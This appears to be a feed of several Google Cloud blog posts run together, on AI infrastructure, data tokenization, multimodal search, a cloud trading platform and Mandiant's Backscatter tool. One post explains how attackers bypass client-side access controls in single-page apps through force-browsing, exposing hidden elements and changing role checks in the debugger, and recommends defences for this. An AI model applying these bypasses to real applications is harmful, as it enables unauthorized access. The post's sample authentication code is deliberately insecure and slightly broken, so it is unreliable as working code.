The last few weeks of 2024 were exhilarating as we worked to bring you multiple advancements in AI infrastructure, including the general availability of Trillium, our sixth-generation TPU, A3 Ultra VMspowered by NVIDIA H200 GPUs, support for up to 65,000 nodes in Google Kubernetes Engine (GKE), and Parallelstore, our distributed file system service that offers low-latency, high-throughput storage that’s essential for HPC and AI workloads. We’re excited to see what you build with these new capabilities.
These innovations come together in AI Hypercomputer, a systems-level approach that draws from our years of experience serving AI experiences for billions of users, and combines performance-optimized hardware, open software and frameworks, and flexible consumption models. This means when you build your AI solution on Google Cloud, you can choose from a set of purpose-built infrastructure components that are designed to work well together. This freedom to choose the appropriate solution for the needs of your specific workload is fundamental to our approach.
Here are some key updates to AI Hypercomputer from the last quarter based on new infrastructure components and how they enable specific AI use cases.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud infrastructure’), (‘body’, <wagtail.rich_text.RichText object at 0x3e565d1aa7c0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/compute’), (‘image’, None)])]>
Running distributed (multi-node) workloads
The performance of multi-node (multi-host) applications such as large-scale AI training and HPC workloads can be highly sensitive to network connectivity, requiring precise setup and proactive monitoring. We wanted to make it easier for customers to run large multi-node workloads on GPUs, and launched A3 Ultra VMs and Hypercompute Cluster, our new highly scalable clustering system. Both offerings were made generally available to close out 2024.
A3 Ultra, with NVIDIA H200 GPUsis a new addition to the A3 family of NVIDIA Hopper GPU-accelerated VMs with twice the GPU-to-GPU network bandwidth and twice the high bandwidth memory (HBM) compared to A3 Mega with NVIDIA H100 GPUs. A3 Ultra VMs offer the best performance in the A3 family. They are built with our new Titanium ML network adapter and incorporate NVIDIA ConnectX-7 network interface cards (NICs) to deliver a secure, high-performance cloud experience for AI workloads. Combined with our datacenter-wide 4-way rail-aligned network, A3 Ultra VMs deliver up to 3.2 Tbps of non-blocking GPU-to-GPU communication with RDMA over Converged Ethernet (RoCE).
A3 Ultra VMs are also available through GKE, which provides an open, portable, extensible, and highly scalable platform for training and serving AI workloads. To try out A3 Ultra VMs, you can easily create a cluster with GKE or try this pretraining GPU recipe.
Hypercompute Cluster, meanwhile, is a supercomputing services platform built on AI Hypercomputer that lets you deploy and manage a large number of accelerators as a single unit. With features such as dense co-location of resources with ultra-low-latency networking, targeted workload placement, advanced maintenance controls to minimize workload disruption, and topology-aware scheduling integrated into popular schedulers like Slurm and GKE, we built Hypercompute Cluster to help you achieve your throughput and resilience goals. You can use a single API call with pre-configured and validated templates for reliable and repeatable deployments, and with cluster-level observability, health monitoring, and diagnostic tooling, Hypercompute Clusters can run your most demanding workloads easily on Google Cloud. Hypercompute Cluster is now available with A3 Ultra VMs.
LG Research is an active user of Google Cloud infrastructure, which they used to train their large language model, Exaone 3.0. They are also an early adopter of A3 Ultra VMs and Hypercompute Cluster, which they are using to power their next set of innovations.
“From the moment we started using Google Cloud’s A3 Ultra with Hypercompute Cluster, powered by NVIDIA H200 GPUs, we were immediately struck by its remarkable performance gains and seamless scalability for our AI workloads. Even more impressive, we had our cluster up and running with our code in under a day — an enormous improvement from the 10 days it used to take us. We look forward to further exploring the potential of this advanced infrastructure for our AI initiatives.” – Jiyeon Jung, AI Infra Sr Engineer, LG AI Research
Making inference on TPUs easier
To enable the next generation of AI agents capable of complex, multi-step reasoning, you need accelerators designed to handle the demanding computational requirements of these advanced models. Trillium TPUs provide significant advancements for inference workloads, delivering up to 3x improvement in inference throughput compared to prior generation TPU v5e.
There are multiple ways to leverage Google Cloud TPUs for AI inference based on your specific needs. You can do this through Vertex AI, our fully managed, unified AI development platform for building and using generative AI, and which is powered by the AI Hypercomputer architecture under the hood. But if you need greater control, we have options lower in the stack that are designed for optimal serving on Cloud TPUs: JetStream is a memory-and-throughput-optimized serving engine for LLMs. MaxDiffusion offers a launching point for diffusion models. And for the Hugging Face community, we worked closely with Hugging Face to launch Optimum TPU and Hugging Face TGI to make serving on Cloud TPUs easier.
Most recently, we announced experimental support for vLLM on TPU with PyTorch/XLA 2.5. Motivated by the great response for this popular serving option, we’ve been running a preview with a small set of customers to get to the stage of bringing the performance (and price-performance) benefits of Cloud TPUs to vLLM.
Our goal is to make it easy for you to try out Cloud TPUs with your existing vLLM setup — just make a few configuration changes to see performance and efficiency benefits in Compute Engine, GKE, Vertex AI, and Dataflow. You can take vLLM for a spin on the Trillium TPUs with this tutorial. All this innovation is happening in the open, and we welcome your contributions.
As we start a new year, we’re excited to continue pushing the boundaries of AI infrastructure with AI Hypercomputer. These updates represent our ongoing commitment to providing you with the performance, efficiency, and ease of use you need to accelerate your AI journey. We look forward to seeing what you achieve with these new capabilities.
In many industries including finance and healthcare, sensitive data such as payment card numbers and government identification numbers need to be secured before they can be used and shared. A common approach is applying tokenization to enhance security and manage risk.
A token is a substitute value that replaces sensitive data during its use or processing. Instead of directly working with the original, sensitive information (usually referred to as the “raw data”), a token acts as a stand-in. Unlike raw data, the token is a scrambled or encrypted value.
Using tokens reduces the real-world risk posed by using the raw data, while maintaining the ability to join or aggregate values across multiple datasets. This technique is known as preserving referential integrity.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e50e5d3cf40>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Tokenization engineered into Google Cloud
While tokenization is often seen as a specialized technology that can be challenging and potentially expensive to integrate into existing systems and workflows, Google Cloud offers powerful, scalable tokenization capabilities as part of our Sensitive Data Protection service. With it, you can make calls into serverless API endpoints to tokenize data on the fly in your own applications and data pipelines.
This allows you to enable tokenization without needing to manage any third-party deployments, hardware, or virtual machines. Additionally, the service is fully regionalized, which means tokenization processing happens in the geographical region of your choice helping you to adhere to regulatory or compliance regimes. The pricing is based on data-throughput with no upfront costs, so you can scale to meet the needs of your business with as little or as much as you need.
Sensitive Data Protection takes things even further offering in-line tokenization for unstructured, natural language content. This allows you to tokenize data in the middle of a sentence and if you pick two-way tokenization (and have the right access permissions), you can even detokenize data back when necessary.
This opens up a whole new set of use-cases including run time tokenization of logs, customer chats, or even as part of a generative AI-serving framework. We’ve also built this technology directly into Contact Center AI and Dialogflow services so that you can tokenize customer engagement on-the-fly.
Tokenization with BigQuery
In addition to serverless access through Sensitive Data Protection, we also offer tokenization directly in BigQuery. This gives you tokenization methods at your fingertips in BigQuery SQL queries, User Defined Functions (UDFs), views, and pipelines.
Tokenization technology is built directly into the BigQuery engine to work at high speed and high scale for structured data, such as tokenizing an entire column of values. The resulting tokens are compatible and interoperable with those generated through our Sensitive Data Protection engine. That means you can tokenize or detokenize in either system without incurring unnecessary latency or costs, all while maintaining the same referential integrity.
Using tokens to solve real problems
While the token obfuscates the risk, utility and value are still preserved. Consider the following table which has four rows and three unique values: value1, value2, value3.
Here you can see that each value is replaced with a token. Notice how “value1” gets “token1” consistently. If you run an aggregation and count unique tokens, you’ll get a count of three, just like on the original value. If you were to join on the tokenized values, you’d get the same type of joins as if joining on the original value.
This simple approach unlocks a lot of use cases.
Obfuscating real-world risk
Consider the use-case of running fraud analysis across 10 million user accounts. In this case, let’s say that all of your transactions are linked to the end-users email address.An email address is an identifier that poses several risks:
It can be used to contact the end-user who owns that email address.
It may link to data in other systems that are not supposed to be joined.
It may identify someone’s real world identity and risk exploding that identity’s connection to internal data.
It may leak other forms of identity, such as the name of the owner of the email account.
Let’s say that the token for that email is “EMAIL(44):AYCLw6BhB0QvauFE5ZPC86Jbn59VogYtTrE7w+rdArLr” and this token has been scoped only to the tables and dataset need for fraud analysis. That token can now be used in place of that email address and you can tokenize the emails across all the transaction tables, and then run fraud analysis.
During this analysis any users or pipelines exposed to the data would only see the obfuscated emails, thus protecting your 10 million users while unblocking your business.
Next steps
Tokenization provides a powerful way to protect sensitive information while still allowing for essential data operations. By replacing sensitive data with non-sensitive substitutes, tokens can significantly reduce the risk of data breaches and simplify compliance efforts. Google Cloud simplifies tokenization by offering a readily available, scalable, and region-aware service, allowing you to focus on your core business rather than managing infrastructure.
To get started on using tokenization on Google Cloud, see the following:
Written by: Steven Karschnia, Truman Brown, Jacob Paullus, Daniel McNamara
Executive Summary
Due to their client-side nature, single-page applications (SPAs) will typically have multiple access control vulnerabilities
By implementing a robust access control policy on supporting APIs, the risks associated with client-side rendering can be largely mitigated
Using server-side rendering within the SPA can prevent unauthorized users from modifying or even viewing pages and data that they are not authorized to see
Introduction
Single-page applications (SPAs) are popular due to their dynamic and user-friendly interfaces, but they can also introduce security risks. The client-side rendering frequently implemented in SPAs can make them vulnerable to unauthorized access and data manipulation. This blog post will explore the vulnerabilities inherent in SPAs, including routing manipulation, hidden element exposure, and JavaScript debugging, as well as provide recommendations on how to mitigate these risks.
Single-Page Applications
A SPA is a web application design framework in which the application returns a single document whose content is hidden, displayed, or otherwise modified by JavaScript. This differs from the flat file application framework traditionally implemented in PHP or strictly HTML sites and from the Model-View-Controller (MVC) architecture where data, views, and server controls are handled by different portions of the application. Dynamic data in SPAs is updated through API calls, eliminating the need for page refreshes or navigation to different URLs. This approach makes SPAs feel more like native applications, offering a seamless user experience. JavaScript frameworks that are commonly used to implement SPAs include React, Angular, and Vue.
Client-Side Rendering
In SPAs that use client-side rendering, a server responds to a request with an HTML document that contains only CSS, metadata, and JavaScript. The initially returned HTML document does not contain any content, and instead once the JavaScript files have been run in the browser, the application’s frontend user interface (UI) and content is loaded into the HTML document at runtime. If the application is designed to use routing, JavaScript takes the URL and attempts to generate the page that the user requested. While this is happening, the application is making requests to the API endpoint to load data and check whether or not the current user is authorized to access the data. If a user is not yet authenticated, then the application will render a login page or redirect the user to a separate single sign-on (SSO) application for authentication.
While all of this happens, a user may briefly observe a blank white page before the application dashboard or login page is loaded into their browser. During this pause, the application is potentially loading hundreds of thousands of lines of minified JavaScript that will build the full user experience of the application. SPAs are used in millions of applications across the globe, including Netflix, Hulu, Uber, and DoorDash.
Issues with Client-Side Rendering
Because SPAs rely entirely on the client’s browser to render content (using API data), users have significant control over the application. This enables users to manipulate the application freely, making user or role impersonation easier.
Routing
One fundamental aspect of the JavaScript frameworks that SPAs are implemented in is the idea of routes. These frameworks use routes to indicate different pages in the application. Routes in this case are different views that a user can see, like a dashboard or user profile. Since all of the JavaScript is handled by the client’s browser, the client can view these routes in the JavaScript files that are included in the application source. If a user can identify these routes, they can attempt to access any of them. Depending on how the JavaScript was implemented, there may be checks in place to see if a user has access to the specific route. The following is an example of React routing that includes information on creating the views, and more importantly path attributes.
One way that access control is handled by SPAs is through hidden page elements. This means that when the page loads, the application checks the user’s role through local/session storage, cookie values, or server responses. After the application checks the user’s role, it then displays or hides elements based on the user’s role. In some cases, the application only renders elements that are accessible by the user. In other cases, the application renders every element but “hides” them by controlling the CSS properties of the element. Hidden elements can be exposed through browser Developer Tools, allowing users to force their display. These hidden elements could be form fields or even links to other pages.
JavaScript Debugging
Modern browsers allow users to debug JavaScript in real time with breakpoints. Modern web browsers allow breakpoints to be set on JavaScript files, which can be used to modify variables or rewrite functions all together. Debugging core functions can allow users to bypass access controls and gain unauthorized page access. Consider the following JavaScript:
function isAuth() {
var user;
var cookies = document.cookies;
var userData = btoa(cookies).split(‘:’);
if (userData.length == 3) {
user.name = userData[0];
user.role = userData[1];
user.isAuthed = userData[2];
} else {
user.name = “”;
user.role = “”;
user.isAuthed = false;
}
return user;
}
The previously defined function reads a user’s cookie, Base64 decodes the value, splits the text using : as the delimiter, and if the values match, it considers the user as authenticated. Identifying these core functions allows an attacker to bypass any authorization and access controls that are being handled by the client-side application.
Exploitation
Manually exploiting JavaScript framework issues takes time and practice, but there are a few techniques that can make it easier. A common technique involves analyzing JavaScript files to identify application routes. Identifying routes allows you to “force-browse” to application pages and access them directly, rather than through the UI. This technique may work on its own, but other times you may need to identify any role checks in the application. These checks can be accessed through the JavaScript debugger to modify variables during execution to bypass authorization or authentication checks. Another useful technique involves capturing server responses to requests for user information in an HTTP proxy, such as Burp Suite Professional, and manually modifying the user object. While these exploitation techniques are effective, they can be mitigated through strong preventative measures, including those detailed in this post.
Recommendations
Access control issues are systemic to client-side-rendered JavaScript frameworks. Once a user has the application loaded into their browser, there are few effective mitigations to prevent the user from interacting with content in unauthorized ways. However, by implementing robust server-side access control checks on APIs, the effect that an attacker could produce is severely reduced. While the attacker might be able to view what a page would look like in the context of an administrator or even view the structure of a privileged request, the attacker would be unable to obtain or modify restricted data.
API requests should be logged and monitored to identify if unauthorized users are attempting to or successfully accessing protected data. Additionally, it is advisable to conduct periodic penetration tests of web applications and APIs throughout their lifetime to identify any gaps in security. Penetration testing should uncover any APIs with partial or incomplete access control implementations, which would provide an opportunity to remediate flaws before they are abused by an adversary.
API Access Controls
Implementing robust API access controls is critical for securing SPAs. Access control mechanisms should use a JSON Web Token (JWT) or other unique, immutable session identifier to prevent users from modifying or forging session tokens. API endpoints should validate session tokens and enforce role-based access for every interaction. APIs are often configured to check if a user is authenticated, but they don’t comprehensively check user role access to an endpoint. In some cases, just one misconfigured endpoint is all it takes to compromise an application. For example, if all application endpoints are checking a user’s role except the admin endpoint that creates new users, then an attacker can create users at arbitrary role levels, including admin users.
An example of proper API access control is shown in Figure 1.
This diagram shows a user authenticating to the application, receiving a JWT, and rendering a page. The user interacts with the SPA and requests a page. The SPA identifies that the user is not authenticated so the JavaScript renders the login page. Once a user submits the login request, the SPA forwards it to the server through an API request. The API responds stating the user is authenticated and provides a JWT that can be used with subsequent requests. Once the SPA receives the response from the server, it stores the JWT and renders the dashboard that the user originally requested.
At the same time, the SPA requests the data necessary to render the page from the API. The API sends the data back to the application, and it is displayed to the user. Next, the user finds a way to bypass the client-side access controls and requests the main admin page in the application. The SPA makes the API requests to render the data for the admin page. The backend server checks the user’s role level, but since the user is not an admin user, the server returns a 403 error stating that the user is not allowed to access the data.
The example in Figure 1 shows how API access controls prevent a user from accessing API data. As stated in the example, the user was able to access the page in the SPA; however, due to the API access controls, they are not able to access the data necessary to fully render the page. For APIs developed in C# or Java, frameworks often provide annotations to simplify implementing access controls.
Server-Side Rendering
Aside from API access controls, another way to mitigate this issue is by using a JavaScript framework that has server-side rendering capabilities, such as Svelte-Kit, Next.js, Nuxt.js, or Gatsby. Server-side rendering is a combination of the MVC and SPA architectures. Instead of delivering all source content at once, the server renders the requested SPA page and sends only the finalized output to the user. The client browser is no longer in charge of routing, rendering, or access controls. The server can enforce access control rules before rendering the HTML, ensuring only authorized users see specific components or data.
An example of server-side rendering is shown in Figure 2.
This diagram shows a user accessing a server-side rendered application. After requesting an authenticated page in the application, the server checks if the user is authenticated and authorized to view the page. Since the user is not yet authenticated, the application renders the login page and displays that page to the user. The user then authenticates, and the server builds out the session, sets necessary cookies or tokens, and then redirects the user to the application dashboard. Upon being redirected, the user makes a request, the server checks the authentication state, and since the user has permissions to access the page, it fetches the necessary data and renders the dashboard with the data.
Next, the user identifies an admin page URL and attempts to access it. In this instance, the application checks the authentication state and the user’s role. Since the user does not have the admin role, they are not allowed to view the page and the server responds with either a 403 Forbidden or a redirection to an error page.
A Final Word
In conclusion, SPAs offer a dynamic and engaging user experience, but they also introduce unique security challenges when implemented with client-side rendering. By understanding the vulnerabilities inherent in SPAs, such as routing manipulation, hidden element exposure, and JavaScript debugging, developers can take proactive steps to mitigate risks. Implementing robust server-side access controls, API security measures, and server-side rendering are excellent ways to safeguard SPAs against unauthorized access and data breaches. Regular penetration testing and security assessments can further strengthen the overall security posture of SPAs by identifying any security gaps present in the application and allowing developers to remediate them before they are exploited. By prioritizing security best practices, developers can ensure that SPAs deliver both a seamless user experience and a secure environment for sensitive data.
The way users search is evolving. When searching for a product, users might type in natural-sounding language or search with images. In return, they want tailored results that are specific to their query. To meet these demands, developers need robust multimodal search systems.
In this blog post, we’ll share a powerful approach to build a multimodal search engine using Google Cloud’s Vertex AI platform. We’ll combine the strengths of Vertex AI Search and vector search, using an ensemble method with weighted Rank-Biased Reciprocal Rank (RRF). This approach allows for:
Improved user experience: Searching becomes more intuitive and less reliant on finding the “perfect” keywords.
Enhanced product discovery: Users can uncover items they might not have found with text alone.
Higher conversion rates: More relevant and engaging search results lead to happier customers and increased sales.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb8e7fbed90>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Why using a combined approach matters
Think about how you search for products online. Assume you want to search for queries such as “homes with a large backyard” or “white marble countertops”. Some of this information might be stored in text, while others might only be available in images. When you search for a product, you want the system to look through both modalities.
One approach might be to ask a Large language model (LLM) to generate a text description of an image. But this can be cumbersome to manage over time and add latency for your users. Instead, we can leverage image embeddings and combine the search results with text data in Vertex AI Search. Together, this multimodal approach delivers:
Richer visual understanding: Multi-modal embeddings capture the complex visual features and relationships within images, going beyond simpler text annotations.
Image-based queries: Users can directly search using an image, allowing for more intuitive discovery based on visual inspiration.
Precise filtering: Filtering by detailed attributes like size, layout, materials, and features becomes possible, leading to highly accurate search and curated results.
Google Cloud’s Vertex AI platform provides a comprehensive set of tools for building and deploying machine learning solutions, including powerful search capabilities:
Vertex AI search: A highly scalable and feature-rich engine for many types of search. It supports advanced features like faceting, filtering, synonyms, and custom relevance ranking. It also enables advanced document parsing including unstructured documents (PDFs) and even those with embedded graphics (e.g. tables, infographics, etc.)
Vertex AI multimodal embedding API: This is used to generate image embeddings (numerical representations of images).
Vertex AI Vector Search: This is used as the vector database to store the embeddings with metadata information for searching. It can store both sparse embeddings, e.g. text descriptions, and dense embeddings, e.g. images.
Our ensemble approach: Text + image power
To create our multimodal search engine, we’ll use an ensemble approach that combines the strengths of Vertex AI Search and vector search for images:
Text search with Vertex AI Search:
Index your product catalog data (names, descriptions, attributes) into a data store using agent builder.
When a user enters a text query, Vertex AI Search returns relevant products based on keyword matching, semantic understanding, and any custom ranking rules you’ve defined.
This also has capabilities to return facets which can further be used for filtering.
You can even visualize how unstructured or complex documents are parsed and chunked
Image search with vector embeddings:
Generate image embeddings for your products using multimodal embeddings API.
Store these embeddings in vector search.
When a user uploads an image or text, convert it to an embedding and query the vector database to find visually similar product images.
Combining results with weighted RRF:
Rank-biased Reciprocal Rank (RRF): This metric measures the relevance of a ranked list by considering the position of the first relevant item. It favors lists where relevant items appear higher.
Weighted RRF: Assign weights to the text relevance score (from Vertex AI Search) and the image similarity score (from vector search). This allows you to adjust the importance of each modality (i.e. Vertex or Vector Search) in the final ranking.
Ensemble: Combine the text and image search results, re-rank them using the weighted RRF score, and present the blended list to the user.
To enhance the search experience, use Vertex AI Agent Builder Search’s faceting capabilities:
Define facets: Based on your product data, create facets for categories, attributes (color, size, material), price ranges, etc.
Dynamic filtering: Allow users to interactively refine their searches using these facets, narrowing down the results to the most relevant products. The filters adjust automatically based on the returned results (hence “dynamic”)
Natural language query understanding: If the textual data is structured then you can enable natural language query understanding in your Vertex AI Agent Builder Search to improve results of the query. You can then parse the filters from the response to apply the same filters to the vector search using namespaces.
Why this approach works
This approach gives developers the best of both worlds by combining the rich features of Vertex AI Search (for example, the parsing pipeline) with the ability to directly utilize images as a query. It’s also flexible and customizable because it adjusts the weights in your RRF ensemble and tailors facets to your specific needs.
Above all, this approach gives your users what they need – the ability to search intuitively using text, images, or both, while offering dynamic filtering options for refined results.
Get started with multi-modal search
By leveraging the power of Vertex AI and combining text and image search with a robust ensemble method, you can build a highly effective and engaging search experience for your users. Get started:
Explore Vertex AI: Dive into the documentation and explore the capabilities of Vertex AI Search and embedding generation.
Experiment with embeddings: Test different image embedding models and fine-tune them on your data if needed.
Implement weighted RRF: Design your scoring function and experiment with different weights to optimize your search results.
Natural language query understanding: Leverage the inbuilt capabilities of Vertex AI agent builder Search to generate filters on structured data to apply the same filters to Vector Search.
Filters in vector search: Apply filters to your image embeddings to further give control to the users.
Earlier this year, Deutsche Börse Group began developing a new cloud-native, purpose-built trading platform. It was built with a focus on digital assets, such as stablecoins, cryptocurrencies, and other tokenized assets. However, the new platform is instrument-agnostic and can trade in all types of assets, from equities to ETFs.
Developing a trading platform for digital assets isn’t just about embracing this increasingly popular and diverse digital investment universe. Tokens and other digital assets originate from decentralized systems, evolve quickly, trade 24/7 across the globe — and require a trading platform fit for purpose. Therefore, if the new trading platform can reliably deliver on digital assets, it can handle just about any asset you’d want to trade.
This work is one of the first major results of the strategic partnership between Deutsche Börse Group and Google Cloud announced in 2023. Today, institutional trading is largely done on-premise with leased-line connectivity or co-location. Deutsche Börse Group have designed a new cloud-native trading engine for a digital trading platform with 24/7 availability and a cloud-native internet API for access (with co-location as a future integration pattern for more demanding market participants) so it can be rolled-out quickly to new markets and operated at low cost.
As an international exchange organization and innovative market infrastructure provider, Deutsche Börse Group ensures capital markets are fair, transparent, reliable and stable. Their business covers the entire financial market transaction process chain, including the provisioning of indices, data, software, SaaS and analytical solutions, as well as admission, trading, and clearing. Additionally, it comprises services for funds, the settlement and custody of financial instruments, and the management of collateral and liquidity.
As a technology company, the Group also develops state-of-the-art IT solutions and offers its IT systems all over the world. Trust, stability, reliability, resilience, consistency, and compliance are the cornerstones of Deutsche Börse Group’s business — and the key features we incorporated into the new trading engine over the ten months it took to build.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb9083b7580>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Digital markets demand new trading systems
Today, Deutsche Börse Group successfully operates high-volume/low-latency trading venues — such as Xetra, Börse Frankfurt, Eurex, and the European Energy Exchange, as well as partner exchanges — by using proven high-performance architectures. Deutsche Börse Group has reached this point by combining financial and technological expertise, and finding the right partners with the knowledge to support its vision.
But even with deep knowledge of our respective fields, the teams at Deutsche Börse Group and Google Cloud knew that building a digital asset trading platform from the ground up would be a challenge. It remains a new and fast-moving space that requires careful and thoughtful consideration to get right.
The need for a new trading engine, and the desire to make it the cornerstone and first component of Deutsche Börse Group’s emerging Digital Asset Business Platform, stems from changing market structures. In the world of digital assets, 24/7 operations are required to reduce execution risk. Market participants also demand choice of market access, including internet connectivity to execute trades anytime, anywhere. Providing access via APIs and convenient SDKs is important for both developer productivity and consistent trade flow. Taken together, these features are essential in markets such as digital assets, where leased line connections and bespoke integrations are not the highest priority.
While traditional trading architectures are designed for industrial purposes and can support high-volume, established markets well, our new trading engine is designed for innovative and changing market structures. They prioritize low time-to-market, with participants demanding rapid deployment and seamless integration. Cloud-native platforms address this need by leveraging the flexibility of the cloud to accelerate deployment and simplify connectivity. This translates to faster deployment and ease of use, which are critical advantages in the dynamic world of digital assets.
Finally, a new trading engine would have to meet not only these new requirements, but also common needs such as resilience, fault-tolerance, and high availability.
The Google Cloud team has prioritized the adoption of cloud resource management best practices — infrastructure as code, the continuous integration of infrastructure changes, and their continuous delivery. This enabled the engineering team to quickly develop, test, and deploy an entire exchange, including infrastructure, with minimal manual intervention, allowing the team to experiment and test the performance of different configurations.
The overall scope was twofold: enable the rapid deployment of new trading venues, and enable incremental changes to existing markets on a daily and even intra-day basis. This would enable a market to operate 24/7.
The architecture of a cloud-native trading system
Recognizing that internet connectivity is the access pattern of choice in the target markets, the Google Cloud team designed a multi-market architecture that uses direct ingress to the Google Cloud’s platform, and leverages a Global External Proxy Network Load Balancer (GEPNLB) for traffic from both TCP/IP sockets and WebSocket clients. Each market environment utilizes its own set of Network Endpoint Groups (NEGs) and Google Kubernetes Engine clusters. This access pattern may change in the future — for example, if the markets become more liquid and therefore attract investors who require low-latency access via colocation and dedicated interconnects.
In this architecture, the NEGs act as backends for the global GEPNLB backend service, and traffic is routed to the NEGs for each market as appropriate. To reduce latency, the architecture uses single tenancy, different subnets per market, and placement policies to minimize distance between critical components and reduce network hops, contributing to improved performance and reduced latency for market participants.
To enhance security, the architecture incorporates Cloud Armor for DDoS protection. A Cloud Armor security policy is attached to the backend service with various rules, including those for mitigating DDoS attacks. This protects the application from malicious traffic and ensures service availability.
The new trading engine at the heart of this architecture initially supports hit-and-take and request-for-offer market models. It uses sophisticated, highly available, high-performance, in-memory, fault-tolerant services to ensure fair and orderly trading. This requires all trade messages to be processed on a strict first-in-first-out basis to maintain order and prevent any unfair advantages. This is a particularly important feature, as it ensures all market participants have an equal opportunity to interact with the market.
A new kind of trading platform for new kinds of markets
To ensure smooth operations and optimal resource allocation, the team designed comprehensive monitoring of all technical activity using the Google Cloud operations suite. This included both functional monitoring to track trading activity, leveraging Google Cloud Trace to follow the lineage of requests coming in from the web and pinpoint bottlenecks, and technical monitoring to ensure the health and performance of the underlying infrastructure. Google Cloud Monitoring captured key performance indicators at each layer of the trading system stack, including application service metrics and resource utilization.
These real-time insights were combined with rigorous performance testing and capacity planning to ensure low-latency handling of high trading volumes. This combination enabled proactive identification and resolution of potential issues and continuous optimization of resource utilization.
To further streamline operations, the integration of managed services offered by Google Cloud, such as backup and archiving, is a future priority for Deutsche Börse Group as it seeks to focus on its core business while relying on Google Cloud for infrastructure management.
Market participants of all kinds are becoming more sophisticated and more demanding every day as technology continues to evolve the way they access markets, and the types of assets they can invest in. Deutsche Börse Group needs to offer services that are equally sophisticated and able to keep pace with the demands of its global customers.
With our new partnership, we have laid the foundation for a trading platform of the future that will serve not only the increasingly popular world of digital assets, but also legacy trading of all kinds. And with the redundancy, flexibility, and security of our work, it has the potential to make trading of all kinds smoother, faster, and more secure.
If you are looking to reinvent your trading platforms, or any other aspect of your financial services business, discover what Google Cloud can do for you today.
Backscatter is a tool developed by the Mandiant FLARE team that aims to automatically extract malware configurations. It relies on static signatures and emulation to extract this information without dynamic execution, bypassing anti-analysis logic present in many modern families. This complements dynamic analysis, providing faster threat identification and high-confidence malware family attribution. Google SecOps reverse engineers ensure precise indicators of compromise (IOC) extraction, empowering security teams with actionable threat intelligence to proactively neutralize attacks.
Overview
The ability to quickly detect and respond to threats has a significant impact on potential outcomes. Indicators of compromise (IOCs) serve as crucial breadcrumbs, allowing cybersecurity teams to identify and mitigate potential attacks while expanding their search for related activity. VirusTotal’s existing suite of tools to analyze and understand malware IOCs, and thus the Google Threat Intelligence platform by extension, is further enhanced with Backscatter.
VirusTotal has traditionally utilized dynamic analysis methods, like sandboxes, to observe malware behavior and capture IOCs. However, these methods can be time-consuming and may not yield actionable data if the malware employs anti-analysis techniques. Backscatter, a service developed by the Mandiant FLARE team, complements these methods by offering a static analysis capability that directly examines malware without executing it, leading to faster and more efficient IOC collection and high-confidence malware family identification. Additionally, Backscatter is capable of analyzing sandbox artifacts, including memory dumps, to improve support for packed and obfuscated malware that does successfully execute in dynamic environments.
Within the Google Threat Intelligence platform, Backscatter shines by identifying configuration data, embedded IOCs, and other malicious artifacts hidden within malware uploaded by users. It can pinpoint command-and-control (C2 or C&C) servers, dropped files, and other signs of malware presence, rapidly generating actionable threat intelligence. All of the extracted IOCs and configuration attributes become immediately pivotable in the Google Threat Intelligence platform, allowing users to identify additional malware related to that threat actor or activity.
Complementing Dynamic Analysis
Backscatter enables security teams to quickly understand and defend against attacks. By leveraging Backscatter’s extracted IOCs in conjunction with static, dynamic, and reputational data, analysts gain a more comprehensive view of potential threats, enabling them to block malicious communication, detect and remove dropped files, and ultimately neutralize attacks.
Backscatter’s static analysis approach, available in Google Threat Intelligence, provides a valuable addition to the platform’s existing dynamic analysis capabilities. This combination offers a more comprehensive threat intelligence strategy, allowing users to leverage the strengths of both approaches for a more robust security posture.
Backscatter in GTI and VirusTotal
Backscatter is available to Google SecOps customers, including VirusTotal Enterprise and its superseding long-term Google Threat Intelligence platform. While detecting a file as malicious can be useful, more clarity about the specific threat provides defenders with actionable intelligence. By providing a higher confidence attribution to a malware family, capabilities and behaviors can be approximated from previous reporting without requiring manual analysis.
Embedded data such as C2 servers, campaign identifiers, file paths, and registry keys can provide analysts with additional contextual information around a specific event. Google Threat Intelligence helps link that event to related activity by providing pivots to related IOCs, reports, and threat actor profiles. This additional context allows defenders to search their environment and expand remediation efforts.
By taking a static approach to extracting data from malware, Backscatter is able to handle files targeting different environments, operating systems, and execution mechanisms. In the previous example, the DONUT malware sample is x86 shellcode and was not able to be executed directly by a sandbox.
Backscatter in the Field
Mandiant Managed Defense leverages Backscatter to deliver faster and more accurate identification and analysis of rapidly emerging malware families. This enables them to more quickly scope threat activity and more rapidly provide customers with pertinent contextual information. From distribution campaigns providing initial access, to ransomware operations, to targeted attacks by state-sponsored actors, Backscatter aims to provide actionable threat intelligence to enable security teams and protect customers.
One example threat group is UNC2500, which primarily distributes malware via email attachments and links to compromised websites. Many of the malware families used by this group, such as QAKBOT and DARKGATE, are supported by Backscatter, allowing Managed Defense customers to proactively block IOCs extracted by Backscatter.
Looking Ahead
Backscatter stands as a testament to Google SecOps’ commitment to providing cutting-edge tools for combating cyber threats. By offering a fast and efficient way to extract IOCs through static analysis, Backscatter empowers security teams to stay one step ahead of attackers. Incorporating Backscatter into their workflow, Google Threat Intelligence customers can strengthen their cybersecurity defenses and safeguard their valuable assets.
For retailers, making intelligent, data-driven decisions in real-time isn’t an advantage — it’s a necessity. Staying ahead of the curve means embracing AI, but many retailers hesitate to adopt because it’s costly to overhaul their technology. While traditional AI implementations may require significant upfront investments, retailers canleverage existing assets to harness the power of AI.
These assets, ranging from security cameras to point-of-sale systems, can unlock store analytics, faster transactions, staff enablement, loss prevention, and personalization — all without straining the budget. In this post, we’ll explore how inference at the edge, a technique that runs AI-optimized applications on local devices without relying on distant cloud servers, can transform retail assets into powerful tools.
aside_block
